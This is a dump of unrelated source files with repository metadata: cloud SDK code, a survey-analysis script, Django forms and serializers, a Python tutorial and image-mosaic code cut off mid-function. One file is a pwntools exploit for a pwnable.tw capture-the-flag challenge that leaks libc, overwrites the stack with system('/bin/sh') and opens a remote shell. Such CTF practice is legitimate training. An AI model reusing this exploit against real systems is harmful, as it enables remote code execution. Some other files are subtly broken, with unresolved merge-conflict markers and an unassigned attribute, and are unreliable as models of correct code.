aliyun/aliyun-openapi-python-sdk
|
4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f
|
83fd547946fd6772cf26f338d9653f4316c81d3c
|
refs/heads/master
| 2023-08-04T12:32:57.028821
| 2023-08-04T06:00:29
| 2023-08-04T06:00:29
| 39,558,861
| 1,080
| 721
|
NOASSERTION
| 2023-09-14T08:51:06
| 2015-07-23T09:39:45
|
Python
|
UTF-8
|
Python
| false
| false
| 1,646
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkecd.endpoint import endpoint_data
class ApproveFotaUpdateRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'ecd', '2020-09-30', 'ApproveFotaUpdate')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_AppVersion(self): # String
return self.get_query_params().get('AppVersion')
def set_AppVersion(self, AppVersion): # String
self.add_query_param('AppVersion', AppVersion)
def get_DesktopId(self): # String
return self.get_query_params().get('DesktopId')
def set_DesktopId(self, DesktopId): # String
self.add_query_param('DesktopId', DesktopId)
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
d77de184040e7ebe354e10ffa5520ea641e93455
|
a6cefd249baa7d7de56c435dbd023339d32b1127
|
/loadmat.py
|
f8e679d2d22dbaac2bdaf945aa7ace060f7a45c7
|
[] |
no_license
|
jmbruges/semSync
|
9ffa8124c5d3b50e3ca4058abe72e748cc591f55
|
88d6791a689796751eccfb249719be70a75fe14f
|
refs/heads/master
| 2020-06-20T01:41:48.486260
| 2019-07-15T07:36:44
| 2019-07-15T07:36:44
| 196,947,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,184
|
py
|
# loadmat.py
import scipy as sp
import scipy.io as spio # this is to import Matlab files, e.g. structure type
def loadmat(filename):
'''
this function should be called instead of direct spio.loadmat
as it cures the problem of not properly recovering python dictionaries
from mat files. It calls the function check keys to cure all entries
which are still mat-objects
'''
data = spio.loadmat(filename, struct_as_record=False, squeeze_me=True)
return _check_keys(data)
def _check_keys(dict):
'''
checks if entries in dictionary are mat-objects. If yes
todict is called to change them to nested dictionaries
'''
for key in dict:
if isinstance(dict[key], spio.matlab.mio5_params.mat_struct):
dict[key] = _todict(dict[key])
return dict
def _todict(matobj):
'''
A recursive function which constructs from matobjects nested dictionaries
'''
dict = {}
for strg in matobj._fieldnames:
elem = matobj.__dict__[strg]
if isinstance(elem, spio.matlab.mio5_params.mat_struct):
dict[strg] = _todict(elem)
else:
dict[strg] = elem
return dict
|
[
"javbru@pop-os.localdomain"
] |
javbru@pop-os.localdomain
|
bc8493def8d4bd248adf21fd2e2afe1310914713
|
a140fe192fd643ce556fa34bf2f84ddbdb97f091
|
/.history/사용자정의예외처리_20200709155926.py
|
50dfdf7745a95aa031e58bbcf32a3cb61abeb416
|
[] |
no_license
|
sangha0719/py-practice
|
826f13cb422ef43992a69f822b9f04c2cb6d4815
|
6d71ce64bf91cc3bccee81378577d84ba9d9c121
|
refs/heads/master
| 2023-03-13T04:40:55.883279
| 2021-02-25T12:02:04
| 2021-02-25T12:02:04
| 342,230,484
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 630
|
py
|
class BigNumberError(Exception):
def __init__(self, msg):
self.msg
try:
print("한 자리 숫자 나누기 전용 계산기입니다.")
num1 = int(input("첫 번째 숫자를 입력하세요 : "))
num2 = int(input("두 번째 숫자를 입력하세요 : "))
if num1 >= 10 or num2 >= 10:
raise BigNumberError
print("{0} / {1} = {2}".format(num1, num2, int(num1 / num2)))
except ValueError:
print("잘못된 값을 입력하였습니다. 한 자리 숫자만 입력하세요.")
except BigNumberError:
print("에러가 발생하였습니다. 한 자리 숫자만 입력하세요.")
|
[
"sangha0719@gmail.com"
] |
sangha0719@gmail.com
|
1e96e7cc7e1f51834877e17634f948ebee8dc31f
|
ac75b787a84d15e15a3339cc1e72280015f9829f
|
/pyrosim_env/bin/easy_install-2.7
|
60b7a9605667c9c2e8edc2e6ec49206f1af720f9
|
[] |
no_license
|
mmarder96/pyrosim
|
e5cb1ec2c7eb07c5a4c841d4e46cece5cff3ed1e
|
c9879462d58806f5473e55762290a31825bbe6ce
|
refs/heads/master
| 2020-03-31T14:58:11.405260
| 2018-06-24T22:22:06
| 2018-06-24T22:22:06
| 152,317,847
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 262
|
7
|
#!/home/max/dev/pyrosim/pyrosim_env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"demenon290@gmail.com"
] |
demenon290@gmail.com
|
2a413c3593c9375a9624c588d6d41eb2f1c38247
|
7c88abfec665c7e73c672480cfcdbbe374c9ca01
|
/covidportal/beds/forms.py
|
c0315e8607533a14cdd55174051b99f3966f46a4
|
[] |
no_license
|
biya-sussan-varghese/django-app
|
8c75c26baa1f8364291ab547723dc43532ede063
|
9c15f5e6b346d6224fbfca050b634184a71ef363
|
refs/heads/master
| 2023-05-02T05:43:09.982222
| 2021-05-20T17:54:14
| 2021-05-20T17:54:14
| 369,268,105
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,191
|
py
|
<<<<<<< current
from django.forms import ModelForm
from .models import Patient,BedAllocation
class PatientForm(ModelForm):
class Meta:
model = Patient
fields = ['name', 'age','location', 'district', 'phone', 'aadhar', 'category']
class BedAllocationForm(ModelForm):
class Meta:
model = BedAllocation
fields = ['patient', 'category']
def __init__(self, hospital=None, **kwargs):
super(BedAllocationForm, self).__init__(**kwargs)
self.fields['patient'].queryset = Patient.objects.filter(district=hospital.district, status='W')
=======
from django.forms import ModelForm
from .models import Patient,BedAllocation
class PatientForm(ModelForm):
class Meta:
model = Patient
fields = ['name', 'age','location', 'district', 'phone', 'aadhar', 'category']
class BedAllocationForm(ModelForm):
class Meta:
model = BedAllocation
fields = ['patient', 'category']
def __init__(self, hospital=None, **kwargs):
super(BedAllocationForm, self).__init__(**kwargs)
self.fields['patient'].queryset = Patient.objects.filter(district=hospital.district, status='W')
>>>>>>> before discard
|
[
"christy219008@sahrdaya.ac.in"
] |
christy219008@sahrdaya.ac.in
|
31c89ed6485f9df323dbb57e8f982d10e5b85f9e
|
79ed6b86bfbc9d6c97e612662d57fc31007ab85f
|
/sandbox/officeAnalysis.py
|
d426210ba709d11bbde978b24c03b171ab5a0898
|
[] |
no_license
|
saniemi/SamPy
|
d4b97581cbee534ddfb077aeaec4c46eacdf3e15
|
5da864558774c4fefddbe0663db68aea26f0f7a8
|
refs/heads/master
| 2021-01-19T03:18:21.598686
| 2016-08-05T08:26:06
| 2016-08-05T08:26:06
| 55,225,941
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,576
|
py
|
"""
Survey Analysis
===============
A simple script to do some analysis on survey data.
Dependencies
------------
:requires: pandas
:requires: numpy
:requires: matplotlib
:requires: nltk
:requires: wordcloud
:requires: rpy2
Author
------
:author: Sami Niemi (sami.niemi@valtech.co.uk)
Version
-------
:version: 0.1
:date: 24-Mar-2016
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import rpy2.robjects as robjects
import string
import itertools
from collections import Counter
from wordcloud import WordCloud, STOPWORDS
from nltk.corpus import stopwords
#import re
#import nltk
#from nltk.tokenize import TreebankWordTokenizer
#from nltk import word_tokenize
#from nltk.stem.snowball import SnowballStemmer
#from textblob import TextBlob
class WordCloudSMN(WordCloud):
"""
Add a new method to the wordcloud class to bypass tokenizing.
"""
def generate_SMN(self, wordlist):
words = dict(Counter(wordlist).most_common()).items()
self.generate_from_frequencies(words)
return self
def _saveRdata2csv(filename="/Users/saminiemi/Projects/OfficeSurvey/Mikayel/surveymonkey.RData",
outfolder="/Users/saminiemi/Projects/OfficeSurvey/data/"):
"""
Simple function to convert RData file to csv file(s).
:param filename: name of the RData file
:param outfolder: location of the output
:return: None
"""
data = robjects.r['load'](filename)
for x in data:
tmp = robjects.r[x]
try:
print(x)
tmp.to_csvfile(outfolder + str(x) + '.csv')
except:
pass
def loadData(filename, folder="/Users/saminiemi/Projects/OfficeSurvey/data/"):
"""
Load data from a csv file.
:param filename: name of the csv file to load
:param folder: location of the data
:return: data frame
"""
df = pd.read_csv(folder+filename)
return df
def getWords(df, column='Response.Text', verbose=True):
"""
Collect the words from a pandas data frame / series.
Perform tokenizing and various manipulations.
:param df: input data frame / series
:param column: name of the column to stores the information
:param verbose: whether or not to output some extra information
:return: words
:rtype: list
"""
# get data and convert the series to a single string by replacing ; and & with ,
# responses = df[column]
# responses = ', '.join(e.lower().strip().replace(';', ',').replace('&', ',').replace('.', ',') for e in responses.tolist())
# print(responses)
#
#
# # tokenize to words
# words = responses.split(',')
# #words = word_tokenize(responses)
# #words = nltk.tokenize.wordpunct_tokenize(responses)
# #tokenizer = nltk.tokenize.mwe.MWETokenizer()
# #words = tokenizer(responses)
responses = df[column]
words = []
for response in responses:
response = response.strip().replace('.', ',').replace('&', ',').replace(';', ',').replace('!', '').lower()
# split based on commas
tmp = response.split(',')
# if length < 2, no commas, then split on "and"
if len(tmp) < 2:
tmp = response.split('and')
# remove extra spaces
tmp = [i.strip() for i in tmp]
# remove if length less than 2
tmp = [i for i in tmp if len(i) > 2]
# split based on and and :
#tmp = [i.split(';') for i in tmp]
#tmp = list(itertools.chain(*tmp))
#tmp = [i.split('and') for i in tmp]
#tmp = list(itertools.chain(*tmp))
# if length less than 2 then split using space
#if len(tmp) < 2:
# tmp = response.split(' ')
words.append(tmp)
# convert nested lists to a single list
words = list(itertools.chain(*words))
# remove punctuation
punctuations = list(string.punctuation)
words = [i.lower() for i in words if i not in punctuations]
# remove stop words
stop = stopwords.words('english')
stop.append(['looking', 'looks', 'office', 'and', 'some', 'for', 'are'])
words = [i.strip() for i in words if i not in stop]
# remove prefixes and numerals
words = [i.replace(' a ', ' ').strip() for i in words]
words = [i.replace(' an ', '').strip() for i in words]
words = [i.replace(' the ', '').strip() for i in words]
words = [i.replace(' one ', '').strip() for i in words]
words = [i.replace(' two ', '').strip() for i in words]
words = [i.replace(' it ', '').strip() for i in words]
#words = [i.replace(' for ', '').strip() for i in words]
words = [i.replace('plenty of', '').strip() for i in words]
words = [i.replace('like ', '').strip() for i in words]
# brackets
words = [i.replace('(', '').strip() for i in words]
words = [i.replace(')', '').strip() for i in words]
# remove adjectives and please
words = [i.replace('good ', '').strip() for i in words]
words = [i.replace('decent ', '').strip() for i in words]
words = [i.replace('nice ', '').strip() for i in words]
words = [i.replace('big ', '').strip() for i in words]
words = [i.replace('very ', '').strip() for i in words]
words = [i.replace('please', '').strip() for i in words]
# remove acronyms and extras
words = [i.replace('def ', '').strip() for i in words]
words = [i.replace('some ', '').strip() for i in words]
# convert too few to lack of
words = [i.replace('too few ', 'lack of ') for i in words]
words = [i.replace('no ', 'lack of ') for i in words]
words = [i.replace('a lot of ', '') for i in words]
words = [i.replace('too much ', '') for i in words]
# convert comfortable to comfy - these are the same
words = [i.replace('comfortable', 'comfy') for i in words]
words = [i.replace('bicycle', 'bike') for i in words]
# change coffee to coffee machine
words = [i.replace('machine', '').strip() for i in words]
words = [i.replace('coffee', 'coffee machine').strip() for i in words]
# change shower to showers
words = [i.replace('showers', 'shower') for i in words]
words = [i.replace('shower', 'showers') for i in words]
# change wordings
words = [i.replace('lighting', 'lights') for i in words]
# remove if length less than 2
words = [i for i in words if len(i) > 2]
#stemming
#stemmer = SnowballStemmer('english')
#for i, word in enumerate(words):
# words[i] = stemmer.stem(word)
if verbose:
print(words)
return words
def generateStatistics(words, outfile, title, mostcommon=12, verbose=True):
"""
:param words: words in a list
:param outfile: name of the output file
:param title: title of the figure
:param mostcommon: how many of the most common to output
:return: None
"""
word_counts = Counter(words)
# save to a file
with open(outfile.replace('.pdf', '.csv'), 'w') as f:
for k,v in word_counts.most_common():
f.write("{},{}\n".format(k, v))
if verbose:
print("Most common words:")
for item in word_counts.most_common(mostcommon):
print(item)
wc = word_counts.most_common(mostcommon)
words = []
counts = []
for w, c in wc:
words.append(w)
counts.append(c)
y_pos = np.arange(len(words))
# plot statistics
plt.figure(figsize=(12, 12))
plt.subplots_adjust(left=0.3)
plt.barh(y_pos[::-1], counts, align='center', alpha=0.4)
plt.yticks(y_pos[::-1], words)
plt.ylim(y_pos[0] - 1, y_pos[-1] + 1)
plt.xlabel('Number of Times')
plt.title(title)
plt.savefig(outfile)
plt.close()
def generateWordcloud(wordlist, outfile, title, nwords=100):
"""
:param wordlist: words in a list
:param outfile: name of the output file to which to store the figure
:param title: title of the figure
:param nwords: maximum number of words to plot
:return: None
"""
# generate word cloud
wc = WordCloudSMN(background_color="white", max_words=nwords,
width=800, height=400,
stopwords=STOPWORDS.add("looking"),
max_font_size=80, random_state=42)
wc.generate_SMN(wordlist)
# generate the figure
plt.figure(figsize=(16, 16))
plt.title(title)
plt.imshow(wc)
plt.axis("off")
plt.savefig(outfile)
plt.close()
def processTextFile(filename='q1.csv', title='Q1'):
"""
:param filename: name of the data file
:param title: title for the figures
:return: None
"""
data = loadData(filename=filename)
words = getWords(data)
generateWordcloud(words, filename.replace('.csv', 'Wordcloud.pdf'), title)
generateStatistics(words, filename.replace('.csv', 'Histogram.pdf'), title)
def processNumericFileQ6(filename='q6.csv', title='Q6'):
"""
:param filename: name of the input file
:param title: title of the plot
:return: None
"""
data = loadData(filename=filename)
data['sum'] = data['One'] + data['Two'] + data['Three'] + data['Four'] + data['Five']
#data.sort(columns=['One', 'Two', 'Three', 'Four', 'Five'], ascending=False, inplace=True)
data.sort_values(by=['sum', 'One'], ascending=False, inplace=True)
print(data)
x_pos = np.arange(len(data['Answer.Options'].values))
fig, ax = plt.subplots(1, 1, figsize=(8, 10))
plt.subplots_adjust(bottom=0.5)
p1 = ax.bar(x_pos, data['One'], align='center',
alpha=0.4, color='m')
p2 = ax.bar(x_pos, data['Two'], bottom=data['One'],
align='center', alpha=0.4, color='b')
p3 = ax.bar(x_pos, data['Three'], bottom=(data['One'] + data['Two']), align='center',
alpha=0.4, color='r')
p4 = ax.bar(x_pos, data['Four'], bottom=(data['One'] + data['Two'] + data['Three']),
align='center', alpha=0.4, color='green')
p5 = ax.bar(x_pos, data['Five'], bottom=(data['One'] + data['Two'] + data['Three'] + data['Four']),
align='center', alpha=0.4, color='yellow')
ax.set_xticks(x_pos)
ax.set_xticklabels(data['Answer.Options'], rotation=90, ha='center')
ax.set_title(title)
ax.set_yticks([])
ax.xaxis.set_ticks_position('none')
ax.set_xlim(x_pos[0] - 1, x_pos[-1] + 1)
plt.legend((p1[0], p2[0], p3[0], p4[0], p5[0]), ('One', 'Two', 'Three', 'Four', 'Five'))
plt.savefig(filename.replace('.csv', '.pdf'))
plt.close()
def processNumericFileQ7(filename='q7.csv', title='Q7'):
"""
:param filename: name of the input file
:param title: title of the plot
:return: None
"""
data = loadData(filename=filename)
data['sum'] = data['One'] + data['Two'] + data['Three'] + data['Four']
data.sort_values(by=['sum', 'One'], ascending=False, inplace=True)
print(data)
x_pos = np.arange(len(data['Answer.Options'].values))
fig, ax = plt.subplots(1, 1, figsize=(8, 10))
plt.subplots_adjust(bottom=0.4)
p1 = ax.bar(x_pos, data['One'], align='center',
alpha=0.4, color='m')
p2 = ax.bar(x_pos, data['Two'], bottom=data['One'],
align='center', alpha=0.4, color='b')
p3 = ax.bar(x_pos, data['Three'], bottom=(data['One'] + data['Two']), align='center',
alpha=0.4, color='r')
p4 = ax.bar(x_pos, data['Four'], bottom=(data['One'] + data['Two'] + data['Three']),
align='center', alpha=0.4, color='green')
ax.set_xticks(x_pos)
ax.set_xticklabels(data['Answer.Options'], rotation=90, ha='center')
ax.set_title(title)
ax.set_yticks([])
ax.xaxis.set_ticks_position('none')
ax.set_xlim(x_pos[0] - 1, x_pos[-1] + 1)
plt.legend((p1[0], p2[0], p3[0], p4[0]), ('One', 'Two', 'Three', 'Four'))
plt.savefig(filename.replace('.csv', '.pdf'))
plt.close()
def processNumericFileQ8(filename='q8.csv', otherfile='q8_other.csv', title='Q8'):
"""
:param filename: name of the input file
:param title: title of the plot
:return: None
"""
# response data
data = loadData(filename=filename)
data.sort_values(by=['Response.Count'], ascending=False, inplace=True)
# other answers
otherdata = loadData(filename=otherfile)
others = otherdata['If.other..please.specify.'].values
x_pos = np.arange(len(data['Answer.Options'].values))
# generate figure
fig, ax = plt.subplots(1, 1, figsize=(8, 10))
plt.subplots_adjust(bottom=0.35)
ax.bar(x_pos, data['Response.Count'], align='center', alpha=0.4, color='m')
ax.set_xticks(x_pos)
ax.set_xticklabels(data['Answer.Options'], rotation=90, ha='center')
ax.set_title(title)
ax.set_yticks([])
ax.xaxis.set_ticks_position('none')
ax.set_xlim(x_pos[0] - 1, x_pos[-1] + 1)
for i, text in enumerate(others):
ax.annotate('Other: ' + text, xy=(20, (10 + 15*i)), xycoords='figure points')
plt.savefig(filename.replace('.csv', '.pdf'))
plt.close()
if __name__ == "__main__":
_saveRdata2csv()
processTextFile(filename='q1.csv', title='Q1 - How would you describe the office we should be designing?')
processTextFile(filename='q2.csv', title='Q2 - Please give elements that would make you happy about coming into the office')
processTextFile(filename='q3.csv', title='Q3 - Please give elements that would help you produce your best work at the office')
processTextFile(filename='q4.csv', title='Q4 - Please list anything that may hinder your productivity')
processNumericFileQ6()
processNumericFileQ7()
processNumericFileQ8()
|
[
"Sami.Niemi@valtech.co.uk"
] |
Sami.Niemi@valtech.co.uk
|
d947cbfeb799505d1e5542d28c3c4e07143a3117
|
db43e14fb860d20981d7444104ade55bf80ecc57
|
/horse_app/serializer.py
|
fd43d2e49d4687e8d44f6da4cdfbd136f079d5cc
|
[] |
no_license
|
B2Gdevs/horse-market
|
4ee0cb38260e07da2fe9b8aac1cee9df9a27a3f2
|
615da451f3b995a2059c7b4c40e52f951b45394a
|
refs/heads/main
| 2023-05-15T17:59:54.405452
| 2021-05-27T00:01:16
| 2021-05-27T00:01:16
| 368,019,347
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,418
|
py
|
from rest_framework import serializers
from auth_app.serializer import UserSerializer
from horse_app.models import Horse, SliderImage, Message
class HorseViewSerializer(serializers.ModelSerializer):
owner = UserSerializer(many=False)
url = serializers.HyperlinkedIdentityField('horse-detail')
class Meta:
model = Horse
fields = '__all__'
class HorseCreateSerializer(serializers.ModelSerializer):
class Meta:
model = Horse
fields = '__all__'
read_only_fields = ['owner']
class SliderSerializer(serializers.ModelSerializer):
image = serializers.ImageField(use_url=True)
class Meta:
model = SliderImage
fields = ['id', 'image']
read_only_fields = ['id']
class HorseSearchSerializer(serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField('horse-detail')
class Meta:
model = Horse
fields = ['id', 'title', 'image', 'description', 'price', 'address', 'url']
class StripeSerializer(serializers.Serializer):
email = serializers.EmailField(allow_null=False, allow_blank=False)
payment_method_id = serializers.CharField(max_length=200, allow_blank=False, allow_null=False)
product_id = serializers.IntegerField()
class MessageSerializer(serializers.ModelSerializer):
class Meta:
model = Message
fields = '__all__'
read_only_fields = ['horse']
|
[
"b2gdevs@gmail.com"
] |
b2gdevs@gmail.com
|
8932bac6b9449a31176dcb2c912a072e42621129
|
be3f21ff09ca547b4551b3e30c2cd16b32953332
|
/pwnabletw/dubblesort/solve.py
|
57ab24fb8c9ec9487fedec46ae94b42d1f838fa9
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
nithinchowdary007/writeups
|
42369017213a15f53827a942ca45334444364fad
|
6dedce2f01bf653258a2b43c85e086eba8288462
|
refs/heads/master
| 2023-04-14T18:06:13.971831
| 2021-04-09T13:44:46
| 2021-04-09T13:44:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,324
|
py
|
from pwn import *
e = ELF("./dubblesort")
libc = ELF("./libc_32.so.6")
ld = ELF("./ld-2.23.so")
context.binary = e
context.terminal = ["konsole", "-e"]
while True:
# just keep running this POS until u get shell
#p = process([ld.path, e.path], env={"LD_PRELOAD": libc.path})
p = remote("chall.pwnable.tw", "10101")
context.log_level="debug"
#0xf7fd0b13
gdb.attach(p, """break * 0xf7fd0afe
break * 0xf7fd0ab3
c
x/12wx $esp+0x7c
""")
p.recvuntil(":")
p.sendline("\x69"*4 + "A"*16 + "B"*4)
p.recvuntil("\n")
data = "\x00" + p.recv(3)
print(data)
libc.address = u32(data) - 0x1b0000
binsh = next(libc.search("/bin/sh"))
print("libc base", hex(libc.address))
print("libc system", hex(libc.sym["system"]))
print("libc binsh string", hex(binsh))
p.recvuntil(":")
p.sendline("51")
for i in range(10):
p.recvuntil(":")
p.sendline("0")
for i in range(4):
p.recvuntil(":")
p.sendline(str(0xffff0000))
p.recvuntil(":")
p.sendline(str(libc.sym["system"]))
p.recvuntil(":")
p.sendline(str(binsh))
p.recvuntil(":")
p.sendline(str(binsh))
p.recvuntil(":")
p.sendline("A")
p.interactive()
p.close()
|
[
"jwanggt@gmail.com"
] |
jwanggt@gmail.com
|
938eb9df3b8a2db62a40ce15b101f61e6db3da32
|
fda3e6f885f046e5f705cb0aab6dac04c0063e74
|
/scripts/ya-bedev-06-01-00.py
|
1ee63b9b8081c25c826ac218c36cc37b96a2d29c
|
[] |
no_license
|
odvk/ynd-bedev-crs
|
9bbd51ddacc0f0693f76a5d4b076647e744e5950
|
e657b2b9b0b64a82ba815d4acfbb033244d11ae7
|
refs/heads/master
| 2020-07-03T08:50:25.490653
| 2019-08-15T06:14:24
| 2019-08-15T06:14:24
| 201,857,273
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,556
|
py
|
# 1. Что такое библиотеки?
# Библиотека или модуль — это набор готовых функций, объединенных общей темой. Например, в библиотеке math собраны функции для подсчёта математических величин.
"""
Чтобы получить доступ к этим функциям, нужно командой import (англ. «импорт») в начале программы импортировать библиотеку. Это ещё называется «подключить модуль». В случае math пишут import math . Вот вызов извлекающей квадратный корень функции sqrt() из этой библиотеки:
"""
import math # теперь в программе можно пользоваться всеми функциями из модуля math
print(math.sqrt(16))
# 4.0
"""
Уже знакомая вам функция randint() из модуля random выбирает случайное целое число в заданном диапазоне. Но есть и другие, например:
random.choice(список) вернёт случайный элемент из списка
random.random() вернёт случайное дробное число от 0.0 до 1.0 (не включительно)
Если вам не нужны все функции библиотеки, можно подключить только нужные конструкцией from random import choice (из библиотеки random подключить функцию choice).
Вот код для выбора подарка ребёнку. После явного подключения функции choice её можно использовать напрямую, без упоминания имени библиотеки.
"""
from random import choice
def find_a_present(prizes):
return choice(prizes) # пишем choice(), а не random.choice()
print(find_a_present(['кукла', 'жвачка', 'игрушечный питон']))
print(find_a_present(['мяч', 'чебурашка', 'лосяш']))
# Подключая библиотеку, можно присвоить ей новое имя. Например, если не хочется при каждом вызове писать полное имя:
import random as r
print(r.randint(0, 100)) # случайное число от 0 до 99
|
[
"kustov.dv@gmail.com"
] |
kustov.dv@gmail.com
|
f095803d34ccf540ecc117845e2a8679494cef17
|
15f6b817e8fdf0b2fab07149d53a42ad9b20e61b
|
/cod/add_pieces_mosaic.py
|
0e16c85c9025925041772a26f297b16980ab02ac
|
[] |
no_license
|
PredaAlinCatalin/Mosaic-image
|
70fdb0abd702a95769ef8ca9eb75e7e79cb93b5e
|
76cf21d7429ce03c39c5ef345a116805ed7ad553
|
refs/heads/main
| 2023-03-12T00:00:29.789112
| 2021-03-02T19:47:13
| 2021-03-02T19:47:13
| 343,893,378
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,447
|
py
|
from parameters import *
import numpy as np
import pdb
import timeit
import math
def add_pieces_grid(params: Parameters):
start_time = timeit.default_timer()
img_mosaic = np.zeros(params.image_resized.shape, np.uint8)
N, H, W, C = params.small_images.shape
h, w, c = params.image_resized.shape
num_pieces = params.num_pieces_vertical * params.num_pieces_horizontal
small_images_indexes = np.zeros((params.num_pieces_vertical, params.num_pieces_horizontal))
if params.criterion == 'aleator':
for i in range(params.num_pieces_vertical):
for j in range(params.num_pieces_horizontal):
index = np.random.randint(low=0, high=N, size=1)
img_mosaic[i * H: (i + 1) * H, j * W: (j + 1) * W, :] = params.small_images[index]
print('Building mosaic %.2f%%' % (100 * (i * params.num_pieces_horizontal + j + 1) / num_pieces))
elif params.criterion == 'distantaCuloareMedie':
mean_color_pieces = np.mean(params.small_images, axis=(1, 2))
for i in range(params.num_pieces_vertical):
for j in range(params.num_pieces_horizontal):
patch = params.image_resized[i * H: (i + 1) * H, j * W: (j + 1) * W]
mean_patch = np.mean(patch, axis=(0, 1))
index = get_sorted_indices(mean_color_pieces, mean_patch)
for ii in index:
if i > 0:
if small_images_indexes[i - 1, j] == ii:
continue
if j > 0:
if small_images_indexes[i, j - 1] == ii:
continue
break
index = ii
img_mosaic[i * H: (i + 1) * H, j * W: (j + 1) * W] = params.small_images[index]
small_images_indexes[i, j] = index
else:
print('Error! unknown option %s' % params.criterion)
exit(-1)
end_time = timeit.default_timer()
print('Running time: %f s.' % (end_time - start_time))
return img_mosaic
def get_sorted_indices(mean_color_pieces, mean_patch):
distances = np.sum((mean_color_pieces - mean_patch) ** 2, axis=1)
return distances.argsort()
def add_pieces_random(params: Parameters):
start_time = timeit.default_timer()
N, H, W, C = params.small_images.shape
h, w, c = params.image_resized.shape
num_pieces = params.num_pieces_vertical * params.num_pieces_horizontal
bigger_image = np.zeros((h + H, w + W, c))
img_mosaic = np.zeros((h + H, w + W, c), np.uint8)
for i in range(h + H):
for j in range(w + W):
for k in range(c):
if i < h and j < w:
bigger_image[i, j, k] = params.image_resized[i, j, k]
else:
bigger_image[i, j, k] = 0
free_pixels = np.zeros((h + H, w + W), dtype=int)
nr = 0
for i in range(h + H):
for j in range(w + W):
if i < h and j < w:
free_pixels[i, j] = nr
else:
free_pixels[i, j] = -1
nr += 1
if params.criterion == 'aleator':
None
elif params.criterion == 'distantaCuloareMedie':
mean_color_pieces = np.mean(params.small_images, axis=(1, 2))
while True:
free_ = free_pixels[free_pixels > -1]
if len(free_) == 0:
break
index = np.random.randint(low=0, high=len(free_), size=1)
row = math.floor(free_[index] / free_pixels.shape[1])
col = math.floor(free_[index] % free_pixels.shape[1])
patch = bigger_image[row:row + H, col:col + W]
mean_patch = np.mean(patch, axis=(0, 1))
index = get_sorted_indices(mean_color_pieces, mean_patch)[0]
img_mosaic[row:row + H, col:col + W] = params.small_images[index]
free_pixels[row:row + H, col:col + W] = -1
img_mosaic = img_mosaic[0:h, 0:w, :]
else:
print('Error! unknown option %s' % params.criterion)
exit(-1)
end_time = timeit.default_timer()
print('Running time: %f s.' % (end_time - start_time))
return img_mosaic
def add_pieces_hexagon(params: Parameters):
start_time = timeit.default_timer()
N, H, W, C = params.small_images.shape
h, w, c = params.image_resized.shape
num_pieces = params.num_pieces_vertical * params.num_pieces_horizontal
bigger_image = np.zeros((h + 2 * H, w + 2 * W, C))
img_mosaic = np.zeros((h + 2 * H, w + 2 * W, c), np.uint8)
nr_vertical = h + 2 * H
nr_horizontal = w + 2 * W
small_images_indexes = np.zeros((nr_vertical, nr_horizontal))
nr = 0
mask = np.zeros((H, W, C), dtype=int)
for i in range(H):
for j in range(W):
for k in range(C):
mask[i, j, k] = 1
width_divided_by_3 = int(W / 3)
for i in range(H):
for j in range(W):
for k in range(C):
if i < H / 2 - 1 and j < width_divided_by_3 and i + j <= H / 2 - 2:
mask[i, j, k] = 0
if i < H / 2 - 1 and j > 2 * width_divided_by_3 and i <= j - 2 * width_divided_by_3 - 1:
mask[i, j, k] = 0
if i > H / 2 and j < width_divided_by_3 and i - H / 2 > j:
mask[i, j, k] = 0
if i > H / 2 and j > 2 * width_divided_by_3 and i - H / 2 - 1 + j - 2 * width_divided_by_3 - 1 >= H / 2 - 2:
mask[i, j, k] = 0
with open('masca.txt', 'w') as f:
for row in mask:
for elem in row:
f.write("%s " % elem)
f.write("\n")
mean_color_pieces = np.mean(params.small_images, axis=(1, 2))
print(mean_color_pieces.shape)
for i in range(H, h + H):
for j in range(W, w + W):
for k in range(c):
bigger_image[i, j, k] = params.image_resized[i - H, j - W, k]
first_row_start = 14
row_index = 1
for i in range(first_row_start, bigger_image.shape[0] - H, H):
col_index = 0
for j in range(0, bigger_image.shape[1] - W, W + width_divided_by_3):
patch = bigger_image[i: i + H, j: j + W]
mean_patch = np.mean(patch, axis=(0, 1))
index = get_sorted_indices(mean_color_pieces, mean_patch)
for ii in index:
if row_index > 1:
if small_images_indexes[row_index - 2, col_index] == ii:
continue
if col_index > 0:
if small_images_indexes[row_index, col_index - 2] == ii:
continue
if row_index < small_images_indexes.shape[0] - 2 and col_index > 1:
if small_images_indexes[row_index + 2, col_index - 2] == ii:
continue
break
index = ii
img_mosaic[i: i + H, j: j + W] = (1 - mask) * img_mosaic[i: i + H, j: j + W] + mask * params.small_images[index]
small_images_indexes[row_index, col_index] = index
col_index += 2
row_index += 2
row_index = 0
